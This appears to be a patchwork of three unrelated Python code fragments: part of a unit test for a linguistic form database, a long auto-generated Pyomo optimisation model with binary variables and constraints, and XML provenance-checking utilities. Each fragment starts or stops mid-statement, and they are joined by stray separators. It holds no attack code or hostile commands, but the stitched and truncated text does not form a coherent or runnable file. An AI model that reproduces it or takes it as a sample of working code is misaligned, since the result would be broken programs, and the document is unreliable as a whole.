xyz_phrase = Session.query(model.Form).get(xyz_id)
xyz_morpheme_gloss_ids = json.loads(xyz_phrase.morpheme_gloss_ids)
xyz_morpheme_break_ids = json.loads(xyz_phrase.morpheme_break_ids)
new_form_backup_count = Session.query(model.FormBackup).count()
assert new_form_backup_count == form_backup_count + 2 # 'x' and 'xyz' are both updated
assert xyz_morpheme_gloss_ids[0][0][0][1] == u'xx' # The 'x' morpheme is still glossed as '7'
assert xyz_morpheme_break_ids[0][0] == [] # No more 'x' morpheme so w1, m1 is empty
assert xyz_phrase.break_gloss_category == u'x|7|Num-y|8|N-z|9|Num' # Stays unchanged
assert xyz_phrase.syntactic_category_string == u'Num-N-Num' # " "
# Update the morpheme_gloss value of the lexical form 'y' and expect the
# phrasal form 'xyz' to get updated too.
y_params = json.loads(y_params)
y_params['morpheme_gloss'] = u'88'
y_params = json.dumps(y_params)
response = self.app.put(url('form', id=y_id), y_params, self.json_headers, extra_environ)
xyz_phrase = Session.query(model.Form).get(xyz_id)
xyz_morpheme_gloss_ids = json.loads(xyz_phrase.morpheme_gloss_ids)
xyz_morpheme_break_ids = json.loads(xyz_phrase.morpheme_break_ids)
form_backup_count = new_form_backup_count
new_form_backup_count = Session.query(model.FormBackup).count()
assert new_form_backup_count == form_backup_count + 2
assert xyz_morpheme_break_ids[0][1][0][1] == u'88' # The 'y' morpheme is now glossed as '88'
assert xyz_morpheme_gloss_ids[0][1] == [] # No more '8' morpheme so w1, m1 is empty
assert xyz_phrase.break_gloss_category == u'x|7|Num-y|8|N-z|9|Num' # Stays unchanged
assert xyz_phrase.syntactic_category_string == u'Num-N-Num' # " "
# Update the syntactic category of the lexical form 'z' and expect the
# phrasal form 'xyz' to get updated too.
z_params = json.loads(z_params)
z_params['syntactic_category'] = NId
z_params = json.dumps(z_params)
response = self.app.put(url('form', id=z_id), z_params, self.json_headers, extra_environ)
xyz_phrase = Session.query(model.Form).get(xyz_id)
xyz_morpheme_gloss_ids = json.loads(xyz_phrase.morpheme_gloss_ids)
xyz_morpheme_break_ids = json.loads(xyz_phrase.morpheme_break_ids)
form_backup_count = new_form_backup_count
new_form_backup_count = Session.query(model.FormBackup).count()
assert new_form_backup_count == form_backup_count + 2
assert xyz_morpheme_break_ids[0][2][0][2] == u'N' # The 'z' morpheme now has 'N' for category
assert xyz_morpheme_gloss_ids[0][2][0][2] == u'N' # redundant, I know
assert xyz_phrase.break_gloss_category == u'x|7|Num-y|8|N-z|9|N'
assert xyz_phrase.syntactic_category_string == u'Num-N-N'
# Save these values for the next test:
xyz_phrase_morpheme_break_ids = xyz_phrase.morpheme_break_ids
xyz_phrase_morpheme_gloss_ids = xyz_phrase.morpheme_gloss_ids
xyz_phrase_break_gloss_category = xyz_phrase.break_gloss_category
xyz_phrase_syntactic_category_string = xyz_phrase.syntactic_category_string
# Update the lexical form 'z' in a way that is irrelevant to the phrasal
# form 'xyz'; expect 'xyz' to be unaffected.
z_params = json.loads(z_params)
z_params['transcription'] = u'zZz'
z_params['translations'] = [{'transcription': u'999', 'grammaticality': u''}]
z_params = json.dumps(z_params)
response = self.app.put(url('form', id=z_id), z_params, self.json_headers, extra_environ)
new_xyz_phrase = Session.query(model.Form).get(xyz_id)
form_backup_count = new_form_backup_count
new_form_backup_count = Session.query(model.FormBackup).count()
assert new_form_backup_count == form_backup_count + 1 # only the lexical item has been updated
assert xyz_phrase_morpheme_break_ids == new_xyz_phrase.morpheme_break_ids
assert xyz_phrase_morpheme_gloss_ids == new_xyz_phrase.morpheme_gloss_ids
assert xyz_phrase_break_gloss_category == new_xyz_phrase.break_gloss_category
assert xyz_phrase_syntactic_category_string | |
= Var(within=Binary,bounds=(0,1),initialize=0)
m.b1878 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1879 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1880 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1881 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1882 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1883 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1884 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1885 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1886 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1887 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1888 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1889 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1890 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1891 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1892 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1893 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1894 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1895 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1896 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1897 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1898 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1899 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1900 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1901 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1902 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1903 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1904 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1905 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1906 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1907 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1908 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1909 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1910 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1911 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1912 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1913 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1914 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1915 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1916 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1917 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1918 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1919 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1920 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1921 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1922 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1923 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1924 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1925 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1926 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1927 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1928 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1929 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1930 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1931 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1932 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1933 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1934 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1935 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1936 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1937 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1938 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1939 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1940 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1941 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1942 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1943 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1944 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1945 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1946 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1947 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1948 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1949 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1950 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1951 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1952 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1953 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1954 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1955 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1956 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1957 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1958 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1959 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1960 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1961 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1962 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1963 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1964 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1965 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1966 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1967 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1968 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1969 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1970 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1971 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1972 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1973 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1974 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1975 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1976 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1977 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1978 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1979 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1980 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1981 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1982 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1983 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1984 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1985 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1986 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1987 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1988 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1989 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1990 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1991 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1992 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1993 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1994 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1995 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1996 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1997 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1998 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1999 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b2000 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b2001 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b2002 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b2003 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b2004 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b2005 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b2006 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b2007 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b2008 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b2009 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b2010 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b2011 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b2012 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b2013 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b2014 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b2015 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b2016 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b2017 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b2018 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b2019 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b2020 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b2021 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b2022 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b2023 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b2024 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b2025 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b2026 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b2027 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b2028 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b2029 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b2030 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b2031 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b2032 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b2033 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b2034 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b2035 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b2036 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b2037 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b2038 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b2039 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b2040 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b2041 = Var(within=Binary,bounds=(0,1),initialize=0)
m.obj = Objective(expr= - 10*m.x2 - 7*m.x3 - 5*m.x4 - 15*m.x17 - 11*m.x18 - 9*m.x19 - 18*m.x29 - 14*m.x30 - 10*m.x31
- 19*m.x65 - 17*m.x66 - 17*m.x67 + 32*m.x77 + 41*m.x78 + 31*m.x79 + 40*m.x83 + 39*m.x84
+ 27*m.x85 - 16*m.x86 - 16*m.x87 - 15*m.x88 + 2*m.x95 + 2*m.x96 + 2*m.x97 + 3*m.x98 + 2*m.x99
+ 2*m.x100 + 3*m.x101 + 3*m.x102 + 3*m.x103 + 2*m.x104 + 2*m.x105 + 2*m.x106 - 6*m.b923
- 4*m.b924 - 3*m.b925 - 40*m.b926 - 35*m.b927 - 20*m.b928 - 46*m.b929 - 39*m.b930 - 23*m.b931
- 7*m.b935 - 4*m.b936 - 4*m.b937 - 30*m.b938 - 25*m.b939 - 20*m.b940 - 37*m.b941 - 29*m.b942
- 22*m.b943 - 7*m.b947 - 5*m.b948 - 3*m.b949 - 15*m.b950 - 5*m.b951 - 2*m.b952 - 22*m.b953
- 10*m.b954 - 5*m.b955 - 11*m.b959 - 8*m.b960 - 6*m.b961 - 13*m.b962 - 8*m.b963 - 3*m.b964
- 24*m.b965 - 16*m.b966 - 9*m.b967 - 10*m.b971 - 7*m.b972 - 6*m.b973 - 13*m.b974 - 8*m.b975
- 3*m.b976 - 23*m.b977 - 15*m.b978 - 9*m.b979 - 9*m.b983 - 9*m.b984 - 7*m.b985 - 30*m.b986
- 30*m.b987 - 25*m.b988 - 39*m.b989 - 39*m.b990 - 32*m.b991 - 8*m.b995 - 7*m.b996 - 7*m.b997
- 20*m.b998 - 15*m.b999 - 10*m.b1000 - 28*m.b1001 - 22*m.b1002 - 17*m.b1003 - 8*m.b1007
- 6*m.b1008 - 5*m.b1009 - 15*m.b1010 - 10*m.b1011 - 6*m.b1012 - 23*m.b1013 - 16*m.b1014
- 11*m.b1015 - m.x1016 - m.x1017 - m.x1018 + 5*m.x1034 + 10*m.x1035 + 5*m.x1036 - 2*m.x1049
- m.x1050 - 2*m.x1051 - 10*m.x1100 - 5*m.x1101 - 5*m.x1102 - 5*m.x1103 - 5*m.x1104 - 5*m.x1105
+ 40*m.x1124 + 30*m.x1125 + 15*m.x1126 + 15*m.x1127 + 20*m.x1128 + 25*m.x1129 + 10*m.x1130
+ 30*m.x1131 + 40*m.x1132 + 30*m.x1133 + 20*m.x1134 + 20*m.x1135 + 35*m.x1136 + 50*m.x1137
+ 20*m.x1138 + 20*m.x1139 + 30*m.x1140 + 35*m.x1141 + 25*m.x1142 + 50*m.x1143 + 10*m.x1144
+ 15*m.x1145 + 20*m.x1146 + 20*m.x1147 + 30*m.x1169 + 40*m.x1170 + 40*m.x1171 - m.x1184
- m.x1185 - m.x1186 - 5*m.x1235 - 3*m.x1236 - 4*m.x1237 - m.x1238 - m.x1239 - m.x1240
+ 120*m.x1259 + 110*m.x1260 + 150*m.x1261 + 140*m.x1262 + 120*m.x1263 + 100*m.x1264 + 90*m.x1265
+ 60*m.x1266 + 150*m.x1267 + 80*m.x1268 + 90*m.x1269 + 120*m.x1270 + 285*m.x1271 + 390*m.x1272
+ 350*m.x1273 + 290*m.x1274 + 405*m.x1275 + 190*m.x1276 + 280*m.x1277 + 400*m.x1278
+ 430*m.x1279 + 290*m.x1280 + 300*m.x1281 + 240*m.x1282 + 350*m.x1283 + 250*m.x1284
+ 300*m.x1285 - 5*m.b1922 - 4*m.b1923 - 6*m.b1924 - 8*m.b1925 - 7*m.b1926 - 6*m.b1927
- 6*m.b1928 - 9*m.b1929 - 4*m.b1930 - 10*m.b1931 - 9*m.b1932 - 5*m.b1933 - 6*m.b1934
- 10*m.b1935 - 6*m.b1936 - 7*m.b1937 - 7*m.b1938 - 4*m.b1939 - 4*m.b1940 - 3*m.b1941 - 2*m.b1942
- 5*m.b1943 - 6*m.b1944 - 7*m.b1945 - 2*m.b1946 - 5*m.b1947 - 2*m.b1948 - 4*m.b1949 - 7*m.b1950
- 4*m.b1951 - 3*m.b1952 - 9*m.b1953 - 3*m.b1954 - 7*m.b1955 - 2*m.b1956 - 9*m.b1957 - 3*m.b1958
- m.b1959 - 9*m.b1960 - 2*m.b1961 - 6*m.b1962 - 3*m.b1963 - 4*m.b1964 - 8*m.b1965 - m.b1966
- 2*m.b1967 - 5*m.b1968 - 2*m.b1969 - 3*m.b1970 - 4*m.b1971 - 3*m.b1972 - 5*m.b1973 - 7*m.b1974
- 6*m.b1975 - 2*m.b1976 - 8*m.b1977 - 4*m.b1978 - m.b1979 - 4*m.b1980 - m.b1981 - 2*m.b1982
- 5*m.b1983 - 2*m.b1984 - 9*m.b1985 - 2*m.b1986 - 9*m.b1987 - 5*m.b1988 - 8*m.b1989 - 4*m.b1990
- 2*m.b1991 - 3*m.b1992 - 8*m.b1993 - 10*m.b1994 - 6*m.b1995 - 3*m.b1996 - 4*m.b1997 - 8*m.b1998
- 7*m.b1999 - 7*m.b2000 - 3*m.b2001 - 9*m.b2002 - 4*m.b2003 - 8*m.b2004 - 6*m.b2005 - 2*m.b2006
- m.b2007 - 3*m.b2008 - 8*m.b2009 - 3*m.b2010 - 4*m.b2011 - 9*m.b2012 - 5*m.b2013 - m.b2014
- 3*m.b2015 - 9*m.b2016 - 5*m.b2017 - 5*m.b2018 - 3*m.b2019 - 3*m.b2020 - 5*m.b2021 - 3*m.b2022
- 2*m.b2023 - 6*m.b2024 - 4*m.b2025 - 6*m.b2026 - 2*m.b2027 - 6*m.b2028 - 6*m.b2029 - 6*m.b2030
- 4*m.b2031 - 3*m.b2032 - 3*m.b2033 - 2*m.b2034 - m.b2035 - 5*m.b2036 - 8*m.b2037 - 6*m.b2038
- 9*m.b2039 - 5*m.b2040 - 2*m.b2041, sense=maximize)
m.c2 = Constraint(expr= m.x2 - 0.2*m.x107 == 0)
m.c3 = Constraint(expr= m.x3 - 0.2*m.x108 == 0)
m.c4 = Constraint(expr= m.x4 - 0.2*m.x109 == 0)
m.c5 = Constraint(expr= m.x5 - 0.2*m.x110 == 0)
m.c6 = Constraint(expr= m.x6 - 0.2*m.x111 == 0)
m.c7 = Constraint(expr= m.x7 - 0.2*m.x112 == 0)
m.c8 = Constraint(expr= m.x8 - 0.2*m.x113 == 0)
m.c9 = Constraint(expr= m.x9 - 0.2*m.x114 == 0)
m.c10 = Constraint(expr= m.x10 - 0.2*m.x115 == 0)
m.c11 = Constraint(expr= m.x11 - 0.2*m.x116 == 0)
m.c12 = Constraint(expr= m.x12 - 0.2*m.x117 == 0)
m.c13 = Constraint(expr= m.x13 - 0.2*m.x118 == 0)
m.c14 = Constraint(expr= m.x14 - 0.2*m.x119 == 0)
m.c15 = Constraint(expr= m.x15 - 0.2*m.x120 == 0)
m.c16 = Constraint(expr= m.x16 - 0.2*m.x121 == 0)
m.c17 = Constraint(expr= m.x17 - 0.5*m.x122 == 0)
m.c18 = Constraint(expr= m.x18 - 0.5*m.x123 == 0)
m.c19 = Constraint(expr= m.x19 - 0.5*m.x124 == 0)
m.c20 = Constraint(expr= m.x20 - 0.5*m.x125 == 0)
m.c21 = Constraint(expr= m.x21 - 0.5*m.x126 == 0)
m.c22 = Constraint(expr= m.x22 - 0.5*m.x127 == 0)
m.c23 = Constraint(expr= m.x23 - 0.7*m.x128 == 0)
m.c24 = Constraint(expr= m.x24 - 0.7*m.x129 == 0)
m.c25 = Constraint(expr= m.x25 - 0.7*m.x130 == 0)
m.c26 = Constraint(expr= m.x26 - 0.7*m.x131 == 0)
m.c27 = Constraint(expr= m.x27 - 0.7*m.x132 == 0)
m.c28 = Constraint(expr= m.x28 - 0.7*m.x133 == 0)
m.c29 = Constraint(expr= m.x29 - 1.2*m.x134 == 0)
m.c30 = Constraint(expr= m.x30 - 1.2*m.x135 == 0)
m.c31 = Constraint(expr= m.x31 - 1.2*m.x136 == 0)
m.c32 = Constraint(expr= m.x32 - 1.2*m.x137 == 0)
m.c33 = Constraint(expr= m.x33 - 1.2*m.x138 == 0)
m.c34 = Constraint(expr= m.x34 - 1.2*m.x139 == 0)
m.c35 = Constraint(expr= m.x35 - 0.5*m.x140 == 0)
m.c36 = Constraint(expr= m.x36 - 0.5*m.x141 == 0)
m.c37 = Constraint(expr= m.x37 - 0.5*m.x142 == 0)
m.c38 = Constraint(expr= m.x38 - 0.7*m.x143 == 0)
m.c39 = Constraint(expr= m.x39 - 0.7*m.x144 == 0)
m.c40 = Constraint(expr= m.x40 - 0.7*m.x145 == 0)
m.c41 = Constraint(expr= m.x41 - 1.2*m.x146 == 0)
m.c42 = Constraint(expr= m.x42 - 1.2*m.x147 == 0)
m.c43 = Constraint(expr= m.x43 - 1.2*m.x148 == 0)
m.c44 = Constraint(expr= m.x44 - 1.2*m.x149 == 0)
m.c45 = Constraint(expr= m.x45 - 1.2*m.x150 == 0)
m.c46 = Constraint(expr= m.x46 - 1.2*m.x151 == 0)
m.c47 = Constraint(expr= m.x47 - 1.2*m.x152 == 0)
m.c48 = Constraint(expr= m.x48 - 1.2*m.x153 == 0)
m.c49 = Constraint(expr= m.x49 - 1.2*m.x154 == 0)
m.c50 = Constraint(expr= m.x50 - 1.2*m.x155 | |
Find lip:process tags and fill in uuid dictionaries
findprocesstags(xmldocu,xmldocu.getroot(),None,processtagbyuuid,childuuidbyuuid,processtagsnouuid)
obsoleteprocesstagbyuuid={} # Will move from processtagbyuuid into here as we determine tags are obsolete
obsolete_root_uuids=[]
for uuid in list(processtagbyuuid.keys()):
if uuid in processtagbyuuid:
# Move process and sub-processes into obsoleteprocesstagbyuuid if they are obsolete
if process_is_obsolete(processdict,processtagbyuuid,obsoleteprocesstagbyuuid,childuuidbyuuid,uuid):
# This is a root of an obsolete tree, because if we were at a branch or leaf of an obsolete tree, it would have been removed before we got here
obsolete_root_uuids.append(uuid)
pass
pass
pass
msg="Removed %d process tags containing %d total lip:provenance elements (%d remaining)" % (len(obsolete_root_uuids)+len(processtagsnouuid),len(obsoleteprocesstagbyuuid),len(processtagbyuuid))
for processtag in processtagsnouuid:
xmldocu.remelement(processtag)
pass
for uuid in obsolete_root_uuids:
processtag=obsoleteprocesstagbyuuid[uuid]
xmldocu.remelement(processtag)
pass
return msg
def checkallprovenance(xmldocu):
# xmldocu must be in memory... i.e. either locked
# or read in with locking (now) disabled
docdict={}
docdict[xmldocu.get_filehref()]=xmldocu
processdict={}
processdictbyhrefc={}
processdictbyusedelement={}
elementdict={}
globalmessagelists={"error": [],
"warning": [],
"info": [],
"none": []}
treeroot=xmldocu.doc.getroot()
for descendent in iterelementsbutskip(treeroot,LIP+"process"):
refuuids_or_mtime=None
if LIP+"wasgeneratedby" in descendent.attrib:
refuuids_or_mtime=str(descendent.attrib[LIP+"wasgeneratedby"])
pass
else :
globalmessagelists["warning"].append("Element %s does not have lip:wasgenerateby provenance" % (href_context.fromelement(xmldocu,descendent).humanurl()))
pass
element_hrefc=href_context.fromelement(xmldocu,descendent)
checkprovenance("",element_hrefc,refuuids_or_mtime,nsmap=xmldocu.nsmap,docdict=docdict,processdict=processdict,processdictbyhrefc=processdictbyhrefc,processdictbyusedelement=processdictbyusedelement,elementdict=elementdict,globalmessagelists=globalmessagelists)
pass
# merge all messages into totalmessagelists...
# element messages:
totalmessagelists=copy.deepcopy(globalmessagelists)
for elementinfo in elementdict:
(processuuidlist,messagelists)=elementdict[elementinfo]
for messagekey in messagelists:
totalmessagelists[messagekey].extend(messagelists[messagekey])
pass
pass
# process messages:
for processuuid in processdict:
(processpath,elementinfolist,messagelists,parent_process_uuid_or_None)=processdict[processuuid]
for messagekey in messagelists:
totalmessagelists[messagekey].extend(messagelists[messagekey])
pass
pass
return (docdict,processdict,processdictbyhrefc,processdictbyusedelement,elementdict,globalmessagelists,totalmessagelists)
def find_process_value_or_ancestor(process_el,tagpath,default=AttributeError("Could not find tag")):
# tag should use lip: prefix
# print "tag:",tag
gottags=process_el.xpath(tagpath,namespaces={"lip":lip})
if len(gottags)==0:
parent=process_el.getparent()
if parent.tag==LIP+"process":
return find_process_value_or_ancestor(parent,tagpath,default=default)
if isinstance(default,BaseException):
raise default
else:
return default
pass
if len(gottags) > 1:
raise ValueError("Multiple tags: %s" % (unicode(gottags)))
return gottags[0]
def find_process_value_or_ancestor_text(process_el,tagpath,default=AttributeError("Could not find tag")):
ret=find_process_value_or_ancestor(process_el,tagpath,default=None)
if ret is None:
if isinstance(default,BaseException):
raise default
else:
return default
pass
return ret.text
def addquotesifnecessary(arg):
# Does not do robust quoting and escaping, but this should
# cover likely circumstances
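    # Illustrative behaviour: a purely "safe" argument such as foo/bar-1.txt is returned
    # unchanged, while anything containing other characters (spaces, quotes, ...) is wrapped
    # in single quotes, e.g. "has space" -> "'has space'".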
okchars=set(string.digits+string.letters+"-_/.:")
if set(arg).issubset(okchars):
return arg
else:
return "\'"+arg+"\'"
pass
def removequotesifable(arg):
# Does not do robust quoting and escaping, but this should
# cover likely circumstances
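    # Illustrative behaviour: removequotesifable("'abc'") returns "abc"; if the quoted text
    # contains characters outside the safe set (e.g. "'a b'"), the quotes are kept.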
startindex=arg.find('\'')
endindex=arg.rfind('\'')
usearg=arg[(startindex+1):endindex]
okchars=set(string.digits+string.letters+"-_/.:")
if set(usearg).issubset(okchars):
return usearg
else:
return arg[startindex:(endindex+1)]
pass
def getnonprocessparent(foundelement):
# Find the first non-lip:process parent of the specified element
# and return the node itself and the path from foundelement to
# that node.
#
# This used to be useful because lip:process relative ETXPaths are relative
# to the first non-process parent of the lip:process tag.
# So you take the location of the lip:process tag,
# append the path returned by this function,
# and append the relative etxpath,
# and finally canonicalize the result
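    # Illustrative example (hypothetical layout): for a lip:process tag nested at
    # /doc/run/lip:process/lip:process, this returns (<run element>, "../.."), so a relative
    # ETXPath stored in the inner tag would be resolved against
    # <path of the lip:process tag> + "/../.." + <relative ETXPath> and then canonicalized.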
context_node=foundelement.getparent()
append_path=".."
while context_node.tag==LIP+"process":
context_node=context_node.getparent()
append_path+="/.."
pass
return (context_node,append_path)
def suggest(docdict,processdict,processdictbyhrefc,processdictbyusedelement,elementdict,globalmessagelists,totalmessagelists):
from . import xmldoc # don't want this in top-of-file because it creates a circular reference
suggestion_processes=set([])
suggestions=set([])
suggestions_by_prxfile={}
prxfiles=set([])
# print("type(processdict)=%s" % (str(type(processdict))))
for elementinfo in elementdict:
(hrefc,uuid_or_mtime)=elementinfo
(processuuidlist,messagelists)=elementdict[elementinfo]
for message in messagelists["error"]:
if message.startswith("Object provenance does not match for"):
if elementinfo in processdictbyusedelement:
rerunprocess_uuids=processdictbyusedelement[elementinfo]
for rerunprocess_uuid in rerunprocess_uuids:
if rerunprocess_uuid not in processdict:
sys.stderr.write("Warning: process uuid %s not in processdict (?)\n" % (rerunprocess_uuid))
continue
(processhrefc,usedelements,messagelists,parent_uuid_or_None)=processdict[rerunprocess_uuid]
if processhrefc in suggestion_processes:
continue # already handled this process
suggestion_processes.add(processhrefc) # mark this one as handled
processfilehrefc=processhrefc.fragless()
if processfilehrefc not in docdict:
sys.stderr.write("Warning: URL %s not in docdict (?)\n" % (processfilehrefc.absurl()))
continue
xmldocu=docdict[processfilehrefc]
foundelement=processhrefc.evaluate_fragment(xmldocu,None,noprovenance=True)
if len(foundelement)==0:
sys.stderr.write("Warning: Could not find process path %s in URL %s\n" % (processhrefc.gethumanfragment(),processfilehrefc.absurl()))
continue
assert(len(foundelement)==1) # This would be triggered by a hash collision. Should be separately diagnosed in processing.
# foundelement[0] is the lip:process tag
inputfilehrefc=href_context.fromxml(xmldocu,find_process_value_or_ancestor(foundelement[0],"lip:inputfile"))
